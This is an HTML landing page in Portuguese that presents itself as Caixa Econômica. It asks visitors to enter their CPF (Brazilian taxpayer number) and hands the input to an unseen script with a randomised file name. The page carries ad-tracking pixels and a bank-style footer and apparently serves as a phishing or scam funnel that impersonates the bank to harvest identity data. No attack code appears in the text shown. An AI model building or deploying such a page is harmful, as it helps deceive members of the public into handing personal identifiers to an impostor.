﻿<!DOCTYPE html><html lang="pt-BR"><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica</title>
  

<script src="../scripts/utms/latest-1.js" data-utmify-prevent-subids="" async="" defer=""></script>

    <link rel="stylesheet" href="css/juyHb48NnU78.css">
</head>

<body>
    <div class="container">
        <div class="header" style="display: flex; justify-content: center;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>

        <div>
            <main>
                <h1>Quase lá!</h1>

                <p>Digite seu CPF para continuarmos</p>

                <div class="form-container">
                    <label for="cpf">Digite seu CPF</label>

                    <input type="text" id="cpf" placeholder="000.000.000-00">

                    <button id="continue-cpf" type="button">Continuar</button>
                </div>

                <div id="submit-container" style="display: none;">
                    <button id="submit-cpf" type="button">Enviar</button>
                </div>
            </main>

            <footer>
                <p>© Caixa Econômica - Todos os direitos reservados.</p>
                
                <p>CNPJ: 09.694.966/0001-40</p>
                
                <p><a href="#">Política de Privacidade</a></p>
            </footer>
        </div>
    </div>

    <script src="js/hffzO35rmUVn.js"></script>



</body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>